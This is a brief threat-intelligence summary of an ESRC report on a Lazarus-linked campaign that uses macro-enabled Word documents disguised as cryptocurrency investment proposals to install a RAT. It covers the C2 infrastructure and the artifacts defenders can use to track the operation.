ESRC reports a Lazarus-linked APT operation using malicious Microsoft Word documents disguised as cryptocurrency and fintech investment proposals. The documents prompt victims to enable macros, then connect to a website to install additional malware; ESRC also found a related RAT/backdoor executable series built in November 2018 with code structure matching samples observed in February. The activity appears aimed mainly overseas, with some reports from South Africa, and ESRC notes similarities in regional exposure to prior HIDDEN COBRA FASTCash reporting. The malware communicates with four C2 servers using two South Korean and two U.S. IP addresses, and some U.S.-hosted Windows servers were also used to distribute malicious files. Code reuse, updated C2 addresses, encrypted internal routines, and possible Korean-language build-environment artifacts give defenders concrete pivots for tracking the operation.